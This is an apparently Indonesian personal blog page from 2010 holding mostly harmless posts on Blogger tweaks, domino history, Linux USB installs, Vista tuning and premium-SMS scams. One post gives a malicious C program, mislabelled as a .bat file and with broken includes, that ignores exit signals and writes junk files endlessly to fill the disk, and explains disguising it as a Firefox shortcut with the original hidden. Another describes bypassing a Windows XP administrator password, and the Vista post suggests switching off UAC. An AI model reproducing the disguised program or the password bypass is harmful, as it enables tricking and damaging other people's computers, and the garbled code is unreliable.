Latest Entries »

Sabtu, Juni 26, 2010

JIKA 1 DOLAR sama dengan 1 rupiah

Jika nilai US$ 1 = Rp 1,-...kira-kira apa aja yang terjadi di Indonesia? *dengan asumsi kurs negara tetangga lainnya tetap*

1. Masyarakat bisa gonta ganti mobil semaunya..Beli Honda city dengan Rp.30.000,- dan Toyota Landcruiser Rp 70.000,-, BMW/Mercedes Benz gak nyampe Rp 1 juta, de el el..

2. Bakal ada transfer pemain sepak bola besar-besaran di Indonesia. Bukan tidak mungkin Persija Jakarta akan membeli David Beckham dan Ronaldinho. Sementara PSBL Bandar Lampung akan mengontrak Zenedine Zidane dan Ronaldo, Nah lho...Alexandro Delpiero dan Paolo Maldini *pemain kesayangan gw* juga bisa di kontrak buat main di Indonesia, Kebayang gak sih..Pemain-pemain lokal akan bertanding dengan pemain-pemain kelas dunia?



3. Pemerintah gak perlu lagi ngutang ke IMF, justru malah Indonesia bantu-bantu negara miskin lainnya..Indonesia memang Hwebatt....!!

4. Pengamen, Pengemis, dan tukang parkir bisa langsung meluncur ke luar negri sehabis kerja seharian. Bahkan mereka bisa check-in di hotel-hotel mewah dengan fasilitas kamar presidental room yang harga semalamnya diatas Rp 1,5 juta..

5. Kriminalitas menjadi lebih elit, gak bakal ada lagi copet dengan dua jari, apalagi kapak merah...Gengsi dunks!! Lihat aja di Amrik sono, gak ada penjahat bawa kapak kan?

6. Gak ada lagi pasar loak. Masyarakat jadi malu beli barang-brang bekas...

7. Kebijakan pengadaan rumah sangat3x Sederhana diganti menjadi Real Estate Sangat3x Sederhana..

8. Fasilitas sehari-hari menggunakan jasa komputer+smart card, jadi gak perlu lagi antri tiket di loket stasiun, pekerja-pekerja kantoran yang biasanya kerja sambil ngobrol. dan gak memberi kepuasan pada customers...jadi lebih punya banyak waktu untuk ngobrol panjang lebar dengan temen-temen..., de-el-el

9. Masyarakat kita gak perlu lagi pusing masalah issue formalin, daripada ketakutan beli mie ayam, tahu, dan ikan asin...mendingan mampir aja ke restoran dan pesen pizza, burger, dan makanan lainnya sepuasnya..



»»  READMORE...

DAFTAR ISI BLOG SAMPEWEWEH



»»  READMORE...

Rabu, Juni 23, 2010

cara compress kode CSS blog

cara mengcompresi css dengan CSS compresor ini trik saya dapet setelah googling sana-sini hehhee

tapi menurut saya tehnik ini tidak serta merta membuat blog kita jadi cepat coz liad aja blog ku yNG UDAH di compress gimana cepet atau gak ????

tehnik ini hanya mengoptimalisasi saja css kita tapi gak ap dah saya posting sapa tau ada yang mau coba
langsung ke tKP

masuk sini
disini di sediakan 3 level mode compresi
saya sarankan yang mode light dulu ntar kalo bisa mode normal dan kalo bisa lagi pake mode super compact hehe

Pada halaman Edit HTML, Code CSS biasanya terletak diatara kode <b:skin><![CDATA[ dan ]]></b:skin> silahkan copy-paste semua kodenya kemudian lakukan kompress pada tools diatas, jika sudah..copy-paste lagi kode yang sudah di compress ke halaman Edit Html pada posisi semula. Selamat mencoba :)


»»  READMORE...

cara daftar di search engine

cara daftar di search engine itu gampang dan mudah , tapi ngapain harus di posting karena banyak dari para blogger yang mengira blognya telah terdaftar di search engine secara otomatis padahal sebenarnya tidak sama sekali
Nah makanya saya posting ini agar tidak bertele-tele langsung aja


Untuk mendaftar ke google, silahkan sobat kunjungi http://www.google.com/addurl/, nah apabila sudah berada pada halaman pendaftaran ada beberapa langkah yang harus di lakukan, yaitu mengisi form yang di sediakan

1. URL --> Isi dengan URL blog sobat.

2. Comments --> Isi dengan keyword atau kata kunci yang berhubungan dengan blog sobat

3. Isi kotak kosong dengan huruf Verifikasi yang tersedia

4. Klik tombol Add URL

5. Selesai.

Setelah sobat melakukan pendaftaran ke Google, maka tidak serta merta blog sobat terindeks pada mesin pencari nya, akan tetapi memerlukan 3 sampai 4 minggu baru blog sobat bisa terindeks. Jika sudah 3 sampai 4 minggu, maka cobalah ketik alamat blog sobat pada mesin pencari google, apakah sudah terindeks atau belum? jika belum, coba tunggu beberapa minggu lagi, dan tuliskan kembali alamat blog sobat, Jika ternyata masih belum juga, coba deh daftarin lagi blog nya ke google seperti langkah di atas



Untuk mendaftar ke yahoo! silahkan sobat kunjungi https://siteexplorer.search.yahoo.com/submit. Akan tetapi untuk mendaftar ke yahoo, sobat harus terlebih dahulu mempunyai account yahoo, karena di perlukan log in terlebih dahulu ke account yahoo. Bagi yang belum punya account yahoo (email di yahoo) silahkan bikin dulu, bagi yang sudah punya, sobat tinggal login dengan username serta password sobat. Apabila sudah login, nanti sudah tersedia kolom untuk di isi, silahkan isi kolom tersebut dengan URL sobat, kemudian klik tombol Add URL, selesai



»»  READMORE...

Senin, Juni 14, 2010

sejarah domino

Yang Chu sz ubi (Penyelidikan pada hadis All Things) menyatakan bahwa domino diciptakan oleh seorang negarawan di 1120 Masehi. Orang ini dikatakan telah memberi mereka kepada Kaisar Hui Tsung, dan bahwa mereka beredar di luar negeri oleh perintah kekaisaran pada masa pemerintahan putra Hui, Kao-Tsung (1127-1163 M). Penafsir lain mengatakan bahwa dokumen ini mengacu pada standardisasi dan bukan penemuan permainan itu sendiri.




Michael Dummett menulis pendek di bagian sejarah dari "Game of Tarot" (halaman 35) berpacaran dengan pengenalan domino di Eropa ke Italia, mungkin di Venesia dan Naples, di abad 18. Walaupun ubin domino jelas dari cina warisan, ada perdebatan apakah mengatur ubin Eropa berasal dari Cina ke Eropa pada abad keempat belas atau diciptakan secara independen.

Domino tunggal ditemukan dengan Mary Rose rongsokan (awal abad 16-Mei), tetapi nampaknya telah menemukan jalannya ada banyak kemudian. Secara keseluruhan, ada begitu banyak bukti untuk permainan di abad 16 dan abad 17 bahwa jika domino ada mereka tidak akan lolos dari catatan.

Domino Eropa adalah empat persegi panjang yang dua kali lebih lama karena mereka lebar. Ada satu ubin untuk setiap kombinasi dari wajah sepasang dadu; yang kosong sesuai adalah melemparkan satu mati, dengan total dua puluh delapan ubin di enam Double standar ditetapkan. Set lain dengan jumlah yang lebih besar ubin diciptakan kemudian, dengan sembilan ganda dan ganda dua belas set menjadi ekstensi yang paling umum.

Kata "domino" yang paling mungkin berasal dari bahasa Latin, Dominus (mis. tuan rumah). Para penyeru, Domine, menjadi pendeta Skotlandia dan Inggris (mis. sekolah). Datif atau ablatif, domino, menjadi Perancis dan kemudian Inggris domino. Kata ini pertama dirujuk ke jenis monastik tudung, lalu ke menyamar berkerudung kostum dengan topeng kecil, lalu ke topeng itu sendiri, dan akhirnya ke salah satu potongan di set domino, yaitu [1-1] ubin.

Permainan pindah dari Italia ke Prancis pada awal abad 18 dan menjadi mode. Pada akhir abad ke-18, Perancis juga memproduksi domino teka-teki. Teka-teki itu dari dua jenis. Pertama, Anda diberi pola dan diminta untuk memasang ubin di atasnya sedemikian rupa sehingga berakhir cocok. Pada jenis kedua, Anda diberi pola dan diminta untuk memasang ubin didasarkan pada sifat aritmatika pips, biasanya total garis ubin dan ubin setengah-setengah. Buku KREATIF PUZZLES OF THE WORLD oleh van Delft dan Botermans (Abrams, New York, ISBN 0-8109-0765-8 (hardcover) atau ISBN 0-8109-2152-9 (softcover); 1978) telah reproduksi antik Prancis teka-teki gambar yang dirakit oleh domino mencocokkan ubin pada bagian bawah gambar kuadrat dari periode ini.

Permainan tiba di Britania Raya pada akhir abad 18 dari Perancis (mungkin melalui tahanan perang Perancis) dan cepat tampaknya telah menjadi populer di penginapan dan bar pada saat itu.

Kata "Domino" adalah bahasa Perancis untuk hitam dan kerudung putih yang dikenakan oleh para pendeta Kristen di musim dingin yang mungkin di mana nama permainan ini berasal dari. Permainan domino dimainkan di seluruh dunia, tetapi mereka yang paling populer di Amerika Latin.

Inuits (Eskimo, untuk menggunakan istilah tua dan tidak tepat, karena ini penduduk asli Amerika Utara) memainkan game dengan ubin yang terbuat dari tulang yang sangat mirip dengan Dominoes Barat. Permainan ini mungkin meniru permainan Barat daripada penemuan asli.

Banyak permainan domino yang kita kaitkan dengan sangat modern. Permainan blok tampaknya menjadi tertua permainan Eropa. Tetapi orang bodoh berasal dari awal abad ke-20. Banyak permainan yang dijelaskan pada halaman web ini diciptakan dalam beberapa dekade terakhir.

sumber artikel aneh dan lucu
»»  READMORE...

membuat fungsi scroll di arsip blog

yah sesuai judul di atass saya aakan mengajarkan cara membuat fungsi scroll pada arsip blog

yah terkadang dalam 1 bulan bisa sampe puluhan postingan sehingga arsip itu akan memenuhi beranda anda sekalian
itu membuat loading blog anda menjadi sangat lama
dari pada bannyak cincong langsung ajja deh


langkah langkahnyya sebagai berikut

• Masuk ke blogger
• Klik Tata Letak
• Klik Elemen Halaman
• Tambahkan sebuah elemen halaman=> Tambah elemen Arsip Blog
• Tapi Anda harus pilih gaya Hierarki


Pada Menu Diatas Itu belum terdapat fungsi scroll, untuk membuatnya memiliki fungsi scroll ikuti langkah-langkahnya lagi !

• Setelah itu, klik Edit Html
• Beri tanda centang pada tulisan Expand Widget Template
• Lalu Anda cari kode seperti ini

<b:widget id='BlogArchive2' locked='false' title='Arsip Blog' type='BlogArchive'>

Anda akan menemukan kode lengkapnya seperti ini :

<b:widget id='BlogArchive2' locked='false' title='Arsip Blog' type='BlogArchive'>
<b:includable id='main'>
<b:if cond='data:title'>
<h2><data:title/></h2>
</b:if>
<div class='widget-content'>
<div style='overflow:auto; width:ancho; height:100px;'>

<div id='ArchiveList'>
<div expr:id='data:widget.instanceId + &quot;_ArchiveList&quot;'>
<b:if cond='data:style == &quot;HIERARCHY&quot;'>
<b:include data='data' name='interval'/>
</b:if>
<b:if cond='data:style == &quot;FLAT&quot;'>
<b:include data='data' name='flat'/>
</b:if>
<b:if cond='data:style == &quot;MENU&quot;'>
<b:include data='data' name='menu'/>
</b:if>
</div>
</div>
</div>

<b:include name='quickedit'/>
</div>
</b:includable>
<b:includable id='flat' var='data'>
<ul>
<b:loop values='data:data' var='i'>
<li class='archivedate'>
<a expr:href='data:i.url'><data:i.name/></a> (<data:i.post-count/>)


yah yang berwarna hijau yang di tambahkan ke blog
angka 100 adalah tingginya silhkan di ganti jika merasa tidak cocok dengan blog kamu
happy blogging ^^

»»  READMORE...

Minggu, Juni 13, 2010

membuat ucapan selamat datang atau alert di blogger

cara membuat script alert pada blog tidak susah kokk
cara membuat ucapan selamat datang di blog
ini sih permintaan teman W ezra
alert ada berbagai macam tapi bwad saat ini say posting yang kaya di blog saayyya aja dah
alert itu loh ucapan selamat datang di halaman awal blog saya

okehh cekidottt


masuk ke blogger dengan id kamu
rancangan edit html
cari kode berikut



</head>


paste script berikut tepat di atas kode

</head>




<SCRIPT language='JavaScript'>alert("taru tekks kalian disiniiiii ");</SCRIPT>


sudah selesaii ^^

haappy bloggingg

»»  READMORE...

cara install linux pake flaskdisk

Selain Windows, sistem operasi Linux juga bisa dijalankan dari sebuah USB (flash disk). Hanya dalam 5 menit, Anda dapat menginstal Linux dari USB.
Anda bisa menggunakan tools bernama UNetbootin. Untuk bisa menginstal Linux dari flash disk, Anda wajib memiliki flash disk berkapasitas meinimal 1GB.
Selain USB, pastikan Anda telah menentukan distribusi Linux yang diinginkan, yaitu: Arch linux, BackTrack, CentOS, CloneZilla, Damn Small Linux, Debian, Dream Linux, Elive, FaunOS, Fedora, Frugalware, Gentoo, Gujin, Kubuntu, Linux Mint, Mandriva, netBSD, NTPasswr, openSUSE, Ophcrack, Parted Magic, PClinuxOS, Puppy Linux, Slax, SliTaZ, Smart Boot Manager, Super Grub Disk, Ubuntu, Xubunu, Zenwalk.


Sebagai contoh, instalasi kali ini menggunakan distro Linux BackTrack 3 dan Ubuntu 8.04.1 LTS, dengan USB Kingstone DataTraveler 2.0 1GB. Berikut langkah-langkah instalasinya, seperti dikutip detikINET dari Softpedia, Jumat (12/9/2008):

1. Download UNetbootin, simpan pada desktop.
2. Klik kanan UNetbootin pada desktop, lalu pilih Properties.
3. Klik tab Permissions, beri tanda centang (v) pada kotak ‘Allow executing file as program’, lalu klik tombol Close.
4. Tancapkan terlebih dulu USB ke port komputer. Ini sangat penting karena Anda tidak akan bisa menggunakan USB jika menancapkannya setelah Anda membuka aplikasi UNetbootin.
5. Selanjutnya, klik dua kali file exe UNetbootin yang sudah di-download tadi, lalu ketikkan password hingga aplikasi UNetbootin terbuka.
6. Pilih distribusi dan versi Linux yang Anda inginkan, lalu pilih tipe instalasi dan klik Ok untuk memulai instalasi.
Selesai! Reboot komputer Anda dan booting-lah dari USB. Kini Anda dapat menggunakan sistem operasi Linux portabel Anda.

untuk download softwraremya cari ndiri linknya ya..
the hacckinggg
»»  READMORE...

software deep freeze download

sedikit tentang deepfreeze
deepfreeze adalah sofware dari faronics, yah kegunaan deepfreeze ini seperti namanya mem_freeze komputer kita,,, ketika kita sudah menginstal os ini di kompi kita,,, misalnya yang kamu freeze drives c saja berarti aapapun yang
kamu lakuin di C gag bakal berfungsi..


mau kamu apus kek mw kamu apa*_in gag bakal berubbah seperti saat kamu pertama kali nginstall deeepfrezze

soo software ini bisa melindungi komputer kita dari virus
makanya banyak warnet yang menggunakan ini software

kelebihan deepfrezze
Keuntungan Deep Freeze :

1. Kita tidak perlu lagi khawatir denagn ancaman virus, sebab setelah komputer terinfeksi virus, kita tinggal merestart komputer tsb dan maka komputer kembali dalam keadaan sebelum terkena virus. Yah berkali2pun virus masuk setelah restart yah kemudian hilang tuh virus, hehe :) sip sip
2. Jika mungkin kita tidak sengaja merubah system misal control panel dan registry, jangan perlu khawatir, restart saja komputernya maka kembali keadaan awal
3. Atau mungkin ada orang iseng yang sok tau kemudian merubah2 settingannya menjadi kacau, hmm ga perlu khawatir ya tinggal restart aja
4. Software ini sangat cocok dan dianjurkan untuk komputer2 warnet yang memang dipakai oleh beberapa user yg berkarakter beda2

Kekurangannya mungkin ini :

1. Kalau kita lupa men-”tawed” atau menonaktifkan DF sebelum menambah dan menginstall program2, maka kita percuma itu saja dan menjadi pekerjaan yg sia2, hehe so jadi jng sampe lupa kalau mau merubah / menginstall program baru.
2. Terkadang juga DF itu rada error, eh HDD malah ga bisa booting OS, karna partisinya menjadi kacau, ini sangat jarang terjadi sih
3. Hmm … misal ni yah, kalo kita lupa password hehe maka komputer tsb tidak dapat kita otak-atik kan juga percuma, selama dalam kondisi “freeze”/”frozen”. Dan terpaksa kita format dan install ulang, eh lupa apa bisa diformat yak partisi HDD yg sudah terdeepfreeze, hehe …
untuk mendownlod ddepfrezee klikk di sini
»»  READMORE...

cara menjebol password win xp

hoooaammmm masi nguntukkk abis nonnton PD
argen menang euyy hahahha'lohh**** kokk ngomongin Pd sihh hahay
sekarang saya bakal membahas sedikit cara jebol password Admin WIN XP


terkadang banyak orang yang saking takutnya kompinya>>>> di jajah ama orang lain pake passsword udah kayak tembok
panjang euyyy


cara cara untuk menjebolya adalhhhhhhh
Pertama : Hidupkan kompimu (bahasa gaulnya = komputer)
Kedua : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe
mode"
tunggu beberapa menit
Ketiga : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
Keempat : Isi login dengan Administrator serta passwordnya terserah anda
pokoknya passwordnya mudah di ingat oleh anda sendiri
Kelima : Jika telah melakukan hal di atas, restart kembali komputer anda
Keenam : Pilihlah start in normaly windows kalo ngga salah heheheh
Ketujuh : Tekan kembali Ctrl + Alt + Del
Kedelapan : Ketikkan nama loginnya Administrator terus password yang baru anda
ubah tadi
Kesembilan : Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda
Kesepuluh : Selesai......terserah anda mau lakukan apasaja...

hahahayyyyyyy
gampang kannn >??????

»»  READMORE...

Sabtu, Juni 12, 2010

cara membuat virus part 2

Wahhh wah sekarang saya bakal buaat / mencoba buat sebuah virus yang berekstensi .bat
Haha tpi sebelumnya saya tidak akan dan tidak mau tahu tentang yang terjadi pada komputer
Sobat jika ingin mencoba sebaiknya di warnet . tapi saya rasa juga tidak usah karena virus ini langsung membuat penyok HD (hardiskk) hhh
Langsung minta ganti hehhe
Saya juga sebenarnya sih belum pernah nyoba ini viruss cozz saya takut :’(
Xixixixixix
Tapi saya yakin banget ma virus saya yang satu ini



Langsung aja dah copas ini di kang notpad dengan nama contoh iman.bat



#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}





Sudahhh sedikit tipsss hhehhe maavv sapa ada yang mw coba
Taruh didesktop file tadi..... sebelumnya hapus icon moziillla , lalu klik kanan_new_shortcut lalu klik browse,, cari file tadi di desktopp lalu klik next tulis nama filenya mozilla firefox
Selesaiiiii lalu untuk merubahnya ke icon mozilla klik kaanann pada shortcut yang baru anda buat , klik changge icon, kalau tidak memiliki icon mozila bisa kalian cari lewad c/progrmfiles/mozillafirefox
Lalu file asli sebaiknya anda hiddenn biar gak ketauan hehhe ^^ otak licik euuyy hhhh
Dan selesai

»»  READMORE...

cara mempercepat kinerja vista

Bagi para pengguna baru yang baru menggunakan Windows Vista, pasti awalnya akan merasa Vista lebih lambat dari XP, jika kita sudah mengoptimalkan Vista, maka dapat membuat Vista lebih cepat dari XP, sekedar berbagi info aja bagi pengguna Vista terutama pengguna baru dan masih awam, ini tips dan trik dari saya untuk membuat Vista jadi lebih cepat dan optimal.

Tips dan Trik 1:
Ketika baru menginstall Windows Vista, dan menjalankan program atau memainkan games, Vista terasa lambat sekali, sekalipun komputer kita sudah mempunyai memory 2Gb, pemecahannya adalah untuk tahap awal Vista harus diinstall patch KB938979 dan KB938194 yang bisa didownload di:
KB938979 32Bit: http://download.microsoft.com/downlo...938979-x86.msu
KB938979 64Bit:http://download.microsoft.com/downlo...938979-x64.msu
KB938194 32Bit: http://download.microsoft.com/downlo...938194-x86.msu
KB938194 64Bit: http://download.microsoft.com/downlo...938194-x64.msu
dan Patch ini katanya dapat meningkatkan performa Vista sampai 200%

Tips dan Trik 2:
Ingin Vista paling tidak tambah aman dan paling tidak tambah lebih cepat, sebaiknya install update berikut ini, biar tambah oke:
KB938979 (Wajib diinstall, baca penjelasan diatas)
KB938194 (Wajib diinstall, baca penjelasan diatas)
KB943899 (Baca: Vista Reliability & Performance Update KB943899)
KB946041 (Baca: Vista Reliability & Performance Update KB943899)
KB941649: (Baca: Update terbaru, KB941649, compatibility, reliability, and stability of Windows Vista)
KB945149 (Baca: NEW Vista hotfix improves multi-GPU performance)
KB925528
KB940105 (Baca: Vista + hotfix KB940105 = kenceng)
KB941600
KB932925 ((Hold 'Em) Khusus untuk pengguna Vista Ultimate)
KB932926 ((Secure Online Key Backup) Khusus untuk pengguna Vista Ultimate)
KB933246 ((BitLocker Drive Preparation Tool) Khusus untuk pengguna Vista Ultimate)
KB933713 ((Windows DreamScene) Khusus untuk pengguna Vista Ultimate)
KB941236 ((Windows DreamScene) Khusus untuk pengguna Vista Ultimate)
KB931133 ((Windows DreamScene) Khusus untuk pengguna Vista Ultimate)
KB941651
KB939159
KB938952
KB937077
KB936825
KB936824
KB936357
KB935280
KB933928
KB933360
KB931573
KB931099
KB930857
KB929735
KB929399
KB932471
KB941202
KB939653
KB938127
KB938123
KB936782
KB936021
KB935807
KB933729
KB933579
KB931213
KB930178
KB929916
KB929123
KB925902
KB935652 ((Hotfix Media Center) Khusus untuk pengguna Vista Ultimate dan Home Premium)
KB941649
KB941229 ((Hotfix Media Center) Khusus untuk pengguna Vista Ultimate dan Home Premium)
KB942763
KB943078
KB942624
KB942615
KB941569
KB941568
KB935509
KB943411
KB941644
KB943899
KB943302
KB938371
KB905866
KB946456
KB946026
KB944533
KB943055
KB937287
KB947172 ((Hotfix Media Center) Khusus untuk pengguna Vista Ultimate dan Home Premium)
KB946041
Semua Updatenya bisa didownload via Windows Update, download manual di http://www.microsoft.com/ (bagi pengguna Vista original) atau download manual di http://thehotfixshare.net/

Tips dan Trik 3:
Untuk paling tidak memperingan beban komputer, Klik kanan di my computer->properties-> advanced system setting
terus di bagian performance klik setting

langsung disable saja yang kaga pentingnya sisain yang kira-kira mau diaktifkan saja, contohnya:
Quote:*Enable desktop composition (ini buat Aero Theme)
*Enable transparent glass (bwt transparasi windows)
*Show preview and filters in folder
*Show thumbnails instead of icons
*Show window contents while dragging
*Smooth edges of screen fonts
*Use drop shadows for icon labels on the desktop
*Use visual styles on windows and buttons
NB: Ini bakal ngerubah tampilan windows kamu, jadi kalau kaga suka sama tampilan ini tinggal kamu balikin saja ke semula,atau klik aja "let Windows choose what's best for my computer"

Tips dan Trik 4
Folder Option:
Buka folder option
caranya buka My Document->Organize->Folder and search option
pilih bagian View
Disable lagi saja yang kira-kira kaga dipakai misalnya
* Display file size information in folder tips.
* Display simple folder view in Navigation pane.
* Hide extensions for known file types.
* Show encrypted or compressed NTFS files in color.
* Show pop-up description for folder and desktop items.
yang lain juga bisa kamu disable,cuma kurang berpengaruh,yang paling ngaruh yang ini saja.

Tips dan Trik 5:
Memperingan Windows Service:
Sekarang set Windows Service nya ke manual
caranya klik kanan di my computer->Manage
double klik Service and Aplication->Service
set saja ke manual biar aman, saya saranin yang ini jangan di disable nanti malah error, klik double klik di Service nya terus set ke manual
Quote:* Application Experience
* Computer Browser
* Desktop Window Manager Session Manager
* Diagnostic Policy Service
* Distributed Link Tracking Client
* Indexing service
* Offline Files
* Portable Device Enumerator Service
* Print Spooler
* ReadyBoost
* Remote Registry
* Secondary Logon
* Security Center
* Server
* System Restore
* Tablet PC Input Service
* TCP/IP NetBIOS Helper Service
* Themes
* Windows Error Reporting Service
* Windows Media Center Service Launcher
* Windows Search
* Windows Time
NB: set ke manual saja, jangan di disable !

Tips dan Trik 6:
Memperingan Startup:
Buka Run trus ketik "msconfig" tanpa tanda(")
masuk ke bagian Startup
kamu uncek saja program yang kaga penting,biar startup windows jadi enteng
contohnya : YM,Adobe,IDM,........
pokonya sisain yang menurut kamu penting saja, terus klik Apply terus OK

Tips dan Trik 7:
Tentang Sound, ternyata berpengaruh juga terhadap startup:
Control panel->Sound
masuk ke bagian Sounds
di sound scheme ganti Windows default jadi No Sound
atau kalau kamu mau pilih-pilih saja suara yang kamu mau dengerin, tapi
Exit Windows, Windows Logoff, Windows Logon and Start Navigation mesti set ke NONE
soalnya ini yang paling berpengaruh.

Tips dan Trik 8:
Tweak Vista biar tambah oke, pengaturannya bisa dicoba sendiri, software yang saya sarankan:
-TweakVI
-Yamicsoft Vista manager
-TweakVista
-DTweak
-Tuneup Utilities
-Vista Start++
-VistaTweaker
-XdN Tweaker
-TweakUAC
-Windows Sidebar Styler
-EasyBCD
-VistaBootPRO
-Stardock LogonStudio
-Windows Vista Boot Logo Generator Beta
-Folder Type Fixer
-Take Control
-MagicTweak
Semua software diatas bisa dicari di www.softpedia.com

Tips dan Trik 9:
Jengkel dengan peringatan dari User Account Control walaupun kita sudah bertindak sebagai Administrator ? Saran saya kalau berani, silahkan saja UAC [User Account Control] di Turn Off, cari di control panel terus user account, klik Turn Off.

Tips dan Trik 10:
Kurang mengerti dengan Bahasa Inggris, cobain install Paket Antarmuka Bahasa Indonesia Windows Vista, info selengkapnya baca: Paket Antarmuka Bahasa Indonesia Windows Vista

Tips dan Trik 11:
Saran dari saya yang lain:
-Install program yg penting saja,yg jarang dipake mending kaga usah di install
-Selalu update driver-driver penting seperti driver VGA
-Update selalu Windowsnya via Windows Update atau download sendiri update dan hotfix di http://thehotfixshare.net/
-Defrag Hardisk paling tidak sebulan sekali, plus Disk Cleanup
-Kalau punya uang tambah memory jadi 4 Gb, upgrade Processornya jadi Quad Core, dan beli VGA kelas mainstream terbaru keatas biar Vista tambah cepat (Bagi yang mampu dan banyak duit)

hahayyyy demikian sumber the hackinggg

»»  READMORE...

tips untuk mencegah sms berlangganan yang menyedot pulsa

yah artikel ini saya copas dari suatu forum di facebook
langsung ajj
Tak terhitung lagi berapa keluhan masyarakat terhadap layanan SMS premium berlangganan atau yang sering disebut REG yang mengakibatkan pulsa tersedot habis. Untuk mencegah serta menghadapi pelanggaran yang dilakukan oleh Content Provider (CP) nakal yang memanfaatkan layanan tersebut untuk menguras pulsa anda secara brutal dan tidak bertanggungjawab, ada baiknya anda ikuti beberapa langkah berikut.




1. Disarankan untuk tidak menggunakan secara bersama-sama satu nomor seluler. Misalnya satu keluarga hanya memiliki sebuah HP dan digunakan secara bergantian oleh beberapa anggota keluarga. Dari fakta yang ada, banyak laporan yang masuk baik ke CP, Operator, maupun BRTI (Badan Regulasi Telekomunikasi Indonesia), pengguna tidak pernah merasa mendaftarkan nomornya ke layanan yang bersangkutan, padahal pada kenyataannya, tampak jelas bahwa pengguna tersebut benar-benar pernah mengirimkan perintah berlangganan ke layanan tersebut. Setelah ditelusuri, ternyata nomor tersebut memang nomor bersama yang digunakan oleh beberapa anggota keluarga.

2. Apabila tidak dapat dihindari penggunaan secara bersama nomor tersebut, selalu pastikan untuk memeriksa semua pesan yang terkirim di directory SENT. Dan pastikan bahwa anda mengetahui seandainya ada perintah untuk berlangganan, dikirim ke nomor berapa pesan tadi. Pesan berlangganan diawali dengan awalan perintah REG. Catat baik-baik perintah tersebut beserta nomor tujuannya. Ini bakal memudahkan pelacakan dikemudian hari.

3. Sebelum mulai berlangganan layanan, pastikan di setiap promosi yang disajikan oleh CP terdapat pemberitahuan yang ?JELAS? bagaimana cara untuk berhenti berlangganan maupun nomor customer service-nya (pastikan nomor ini aktif). Jika tidak, jangan berlangganan layanan tersebut.

4. Cari tahu dengan cermat informasi berapa lama rentang waktu pengiriman satu SMS ke SMS berikutnya. Juga ketahui pula berapa tariff per SMS-nya. Dengan informasi ini, anda dapat mengkalkulasi berapa biaya yang akan anda keluarkan per minggu, atau per bulan. Jika anda ragu, sebaiknya jangan berlangganan.

5. Catat dengan cermat nomor short code misalnya 6789, 1234 dan sebagainya yang menjadi tujuan SMS berlangganan anda.

6. Catat pula pesan apa yang anda ketikkan ke CP tersebut. Disarankan untuk menyimpan setiap detil SMS tersebut dalam HP anda dan jangan pernah menghapusnya sampai anda yakin bahwa anda tidak membutuhkan lagi data tersebut. Beberapa HP memiliki fasilitas penyimpanan pesan yang dikirim dalam bentuk draft, manfaatkan fasilitas ini.

7. Ketika anda telah mendapatkan reply yang memberitahukan bahwa nomor anda telah terdaftar dalam layanan berlangganan tersebut. Pastikan lagi apakah cara berhenti berlangganan yang ditampilkan dalam promosi pihak CP dapat berjalan dengan sempurna. Umumnya untuk berhenti berlangganan, pengguna dapat mengetikkan pesan UNREG yang diikuti dengan spasi dan jenis layanan berlangganan yang telah didaftarkannya tadi.

8. Untuk memastikan apakah anda telah benar-benar ?terbebas? dari layanan tersebut anda perlu menunggunya dalam 1-7 hari. Hal ini terjadi karena kemungkinan pengiriman pesan SMS berlangganan tersebut tidak dilakukan setiap hari namun beberapa layanan bahkan dilakukan dalam periode mingguan.

9. Ketika anda merasa ada sebuah pesan yang tidak diinginkan secara rutin terkirim ke HP anda pada waktu tertentu misalnya setiap hari jam 10 pagi, kemungkinan itu adalah layanan REG yang secara sadar maupun tidak pernah anda daftarkan sebelumnya. Beberapa SMS tak akan terkirim ke HP anda jika anda mematikan HP pada jam-jam tersebut. Namun cara ini tidaklah efektif dan akan mengganggu anda seumur hidup. Pastikan pula berapa pulsa anda terpotong setiap kali menerima SMS tersebut

10. Ketika sebuah SMS yang terindikasi sebagai SMS REG mampir di HP anda, dan anda tidak tahu layanan apa yang sedang dikirimkan, langkah pertama yang harus anda lakukan adalah mencatat nomor pengirim SMS tersebut. Nomor pengirim dari CP dikenali dari jumlah digit-nya yaitu 4 digit atau 6 digit. Apabila yang anda peroleh adalah nomor 6 digit misalnya ABCDEF, maka CP yang sedang mengirimkan Pesan kepada anda adalah CP yang memiliki short code ABCD. Digit berikutnya yaitu EF sebenarnya adalah identitas tarif layanan yang didaftarkan oleh CP yang dikenali oleh mesin operator.

11. Jika anda benar-benar tidak tahu layanan apa yang pernah anda daftarkan, ketik UNREG ke short code ABCD tadi. Perintah UNREG merupakan perintah ?wajib? yang diinstruksikan oleh semua operator ke seluruh CP yang memiliki akses ke operator tersebut untuk menghapus nomor pengguna dari semua layanan REG yang ada di CP dengan short code ABCD tadi. Jika anda telah mendapatkan reply pemberitahuan bahwa nomor anda telah terhapus dari layanan REG tersebut, tunggulah beberapa hari untuk memastikan seperti tercantum dalam tip (8). Selain UNREG, dapat pula dicoba perintah lain misalnya STOP.

12. Jika anda masih tidak berhasil berhenti berlangganan, anda harus melaporkan CP bersangkutan ke operator dimana anda berlangganan. Dengan data yang ada, cukup bagi customer service operator untuk membantu anda berhenti berlangganan. Selanjutnya tunggu seperti di tip (8).

